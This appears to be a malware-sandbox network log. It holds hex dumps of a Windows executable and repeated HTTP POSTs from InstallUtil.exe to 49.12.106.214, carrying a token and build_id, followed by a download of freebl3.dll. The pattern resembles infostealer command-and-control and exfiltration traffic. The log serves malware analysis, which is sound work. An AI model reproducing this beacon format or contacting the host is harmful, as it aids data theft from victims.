                                                                                                                2024-10-08 02:59:45 UTC16122INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00
                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
                                                                                                                2024-10-08 02:59:45 UTC16384INData Raw: 1e 00 e9 9c 25 1b 00 e9 3a f0 19 00 e9 9e cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                Data Ascii: %:X~e!*FW|>|L1146
                                                                                                                2024-10-08 02:59:45 UTC16384INData Raw: 8b c3 0f 1f 40 00 8a 10 3a 11 75 1a 84 d2 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 8b
                                                                                                                Data Ascii: @:utP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSV
                                                                                                                2024-10-08 02:59:45 UTC16384INData Raw: 39 77 12 8d 1c 9b 46 8d 5b e8 8d 1c 59 0f be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 74
                                                                                                                Data Ascii: 9wF[Y0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB|$-tDt$pV9"WfD$hL$lt$hT$5t
                                                                                                                2024-10-08 02:59:46 UTC16384INData Raw: 24 20 89 44 24 24 3b c2 7f 0c 7c 18 8b 44 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f 0a
                                                                                                                Data Ascii: $ D$$;|D$;sD$D$ T$$"$D$k;l$$|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP|$4L$ l$8j|$L$8QW@L$,9L$<|
                                                                                                                2024-10-08 02:59:46 UTC16384INData Raw: 24 10 be 07 00 00 00 eb 32 c7 40 08 01 00 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                Data Ascii: $2@3@f@D$VF@:'|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
                                                                                                                2024-10-08 02:59:46 UTC16384INData Raw: 83 c4 04 85 f6 74 64 8b 7c 24 14 e9 68 fe ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                Data Ascii: td|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
                                                                                                                2024-10-08 02:59:46 UTC16384INData Raw: 83 c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 cc
                                                                                                                Data Ascii: _^][YVt$W|$FVBhtw7t7Vg_^jjjh,g!t$
                                                                                                                2024-10-08 02:59:46 UTC16384INData Raw: 4a 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 e2
                                                                                                                Data Ascii: J,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^|$u|$u_^3ARt$t$PA8tuL$
                                                                                                                2024-10-08 02:59:46 UTC16384INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24
                                                                                                                Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW|$mw<(6XvutT9 $tB8$tPh $VD $)$$


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                8192.168.2.44974949.12.106.2144437648C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-10-08 02:59:48 UTC279OUTPOST / HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=----AKKFHDAKECFHIDHJDAAA
                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                Host: 49.12.106.214
                                                                                                                Content-Length: 4677
                                                                                                                Connection: Keep-Alive
                                                                                                                Cache-Control: no-cache
                                                                                                                2024-10-08 02:59:48 UTC4677OUTData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 46 48 44 41 4b 45 43 46 48 49 44 48 4a 44 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 32 39 38 32 31 37 36 62 38 31 32 63 62 39 32 31 35 34 38 32 65 31 64 39 37 63 32 39 39 37 35 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 46 48 44 41 4b 45 43 46 48 49 44 48 4a 44 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 65 65 31 34 34 35 66 63 36 33 62 63 32 30 64 30 65 37 39 36 36 38 36 37 62 31 33 65 30 65 31 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 46 48 44 41 4b 45 43 46 48 49 44 48 4a 44 41 41 41 0d 0a 43 6f 6e 74
                                                                                                                Data Ascii: ------AKKFHDAKECFHIDHJDAAAContent-Disposition: form-data; name="token"c2982176b812cb9215482e1d97c29975------AKKFHDAKECFHIDHJDAAAContent-Disposition: form-data; name="build_id"2ee1445fc63bc20d0e7966867b13e0e1------AKKFHDAKECFHIDHJDAAACont
                                                                                                                2024-10-08 02:59:49 UTC158INHTTP/1.1 200 OK
                                                                                                                Server: nginx
                                                                                                                Date: Tue, 08 Oct 2024 02:59:49 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                2024-10-08 02:59:49 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 2ok0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                9192.168.2.44975049.12.106.2144437648C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-10-08 02:59:49 UTC279OUTPOST / HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=----DBKEHDGDGHCBGCAKFIII
                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                Host: 49.12.106.214
                                                                                                                Content-Length: 1529
                                                                                                                Connection: Keep-Alive
                                                                                                                Cache-Control: no-cache
                                                                                                                2024-10-08 02:59:49 UTC1529OUTData Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 32 39 38 32 31 37 36 62 38 31 32 63 62 39 32 31 35 34 38 32 65 31 64 39 37 63 32 39 39 37 35 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 65 65 31 34 34 35 66 63 36 33 62 63 32 30 64 30 65 37 39 36 36 38 36 37 62 31 33 65 30 65 31 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 0d 0a 43 6f 6e 74
                                                                                                                Data Ascii: ------DBKEHDGDGHCBGCAKFIIIContent-Disposition: form-data; name="token"c2982176b812cb9215482e1d97c29975------DBKEHDGDGHCBGCAKFIIIContent-Disposition: form-data; name="build_id"2ee1445fc63bc20d0e7966867b13e0e1------DBKEHDGDGHCBGCAKFIIICont
                                                                                                                2024-10-08 02:59:50 UTC158INHTTP/1.1 200 OK
                                                                                                                Server: nginx
                                                                                                                Date: Tue, 08 Oct 2024 02:59:50 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                2024-10-08 02:59:50 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 2ok0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                10192.168.2.44975149.12.106.2144437648C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-10-08 02:59:50 UTC278OUTPOST / HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=----JDBGDHIIDAEBFHJJDBFI
                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                Host: 49.12.106.214
                                                                                                                Content-Length: 437
                                                                                                                Connection: Keep-Alive
                                                                                                                Cache-Control: no-cache
                                                                                                                2024-10-08 02:59:50 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 44 42 47 44 48 49 49 44 41 45 42 46 48 4a 4a 44 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 32 39 38 32 31 37 36 62 38 31 32 63 62 39 32 31 35 34 38 32 65 31 64 39 37 63 32 39 39 37 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 47 44 48 49 49 44 41 45 42 46 48 4a 4a 44 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 65 65 31 34 34 35 66 63 36 33 62 63 32 30 64 30 65 37 39 36 36 38 36 37 62 31 33 65 30 65 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 47 44 48 49 49 44 41 45 42 46 48 4a 4a 44 42 46 49 0d 0a 43 6f 6e 74
                                                                                                                Data Ascii: ------JDBGDHIIDAEBFHJJDBFIContent-Disposition: form-data; name="token"c2982176b812cb9215482e1d97c29975------JDBGDHIIDAEBFHJJDBFIContent-Disposition: form-data; name="build_id"2ee1445fc63bc20d0e7966867b13e0e1------JDBGDHIIDAEBFHJJDBFICont
                                                                                                                2024-10-08 02:59:51 UTC158INHTTP/1.1 200 OK
                                                                                                                Server: nginx
                                                                                                                Date: Tue, 08 Oct 2024 02:59:51 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                2024-10-08 02:59:51 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 2ok0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                11192.168.2.44975249.12.106.2144437648C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-10-08 02:59:51 UTC278OUTPOST / HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=----DGIJECGDGCBKECAKFBGC
                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                Host: 49.12.106.214
                                                                                                                Content-Length: 437
                                                                                                                Connection: Keep-Alive
                                                                                                                Cache-Control: no-cache
                                                                                                                2024-10-08 02:59:51 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 32 39 38 32 31 37 36 62 38 31 32 63 62 39 32 31 35 34 38 32 65 31 64 39 37 63 32 39 39 37 35 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 65 65 31 34 34 35 66 63 36 33 62 63 32 30 64 30 65 37 39 36 36 38 36 37 62 31 33 65 30 65 31 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 43 0d 0a 43 6f 6e 74
                                                                                                                Data Ascii: ------DGIJECGDGCBKECAKFBGCContent-Disposition: form-data; name="token"c2982176b812cb9215482e1d97c29975------DGIJECGDGCBKECAKFBGCContent-Disposition: form-data; name="build_id"2ee1445fc63bc20d0e7966867b13e0e1------DGIJECGDGCBKECAKFBGCCont
                                                                                                                2024-10-08 02:59:52 UTC158INHTTP/1.1 200 OK
                                                                                                                Server: nginx
                                                                                                                Date: Tue, 08 Oct 2024 02:59:52 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                2024-10-08 02:59:52 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 2ok0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                12192.168.2.44975349.12.106.2144437648C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-10-08 02:59:52 UTC197OUTGET /freebl3.dll HTTP/1.1
                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                Host: 49.12.106.214
                                                                                                                Connection: Keep-Alive
                                                                                                                Cache-Control: no-cache
                                                                                                                2024-10-08 02:59:53 UTC261INHTTP/1.1 200 OK
                                                                                                                Server: nginx
                                                                                                                Date: Tue, 08 Oct 2024 02:59:52 GMT
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Length: 685392
                                                                                                                Connection: close
                                                                                                                Last-Modified: Tuesday, 08-Oct-2024 02:59:52 GMT
                                                                                                                Cache-Control: no-store, no-cache
                                                                                                                Accept-Ranges: bytes
                                                                                                                2024-10-08 02:59:53 UTC16123INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00
                                                                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
                                                                                                                2024-10-08 02:59:53 UTC16384INData Raw: ff ff 13 bd 10 ff ff ff 01 c8 89 45 b4 11 df 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f a4
                                                                                                                Data Ascii: E}1M1XM}}UU1M1UM] EH]EE|1E1EMMuuU1M1Mu]uM11U|uuMM1]1x
                                                                                                                2024-10-08 02:59:53 UTC16384INData Raw: c2 08 89 88 90 00 00 00 31 d6 89 b0 9c 00 00 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8 50
                                                                                                                Data Ascii: 1M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]wP
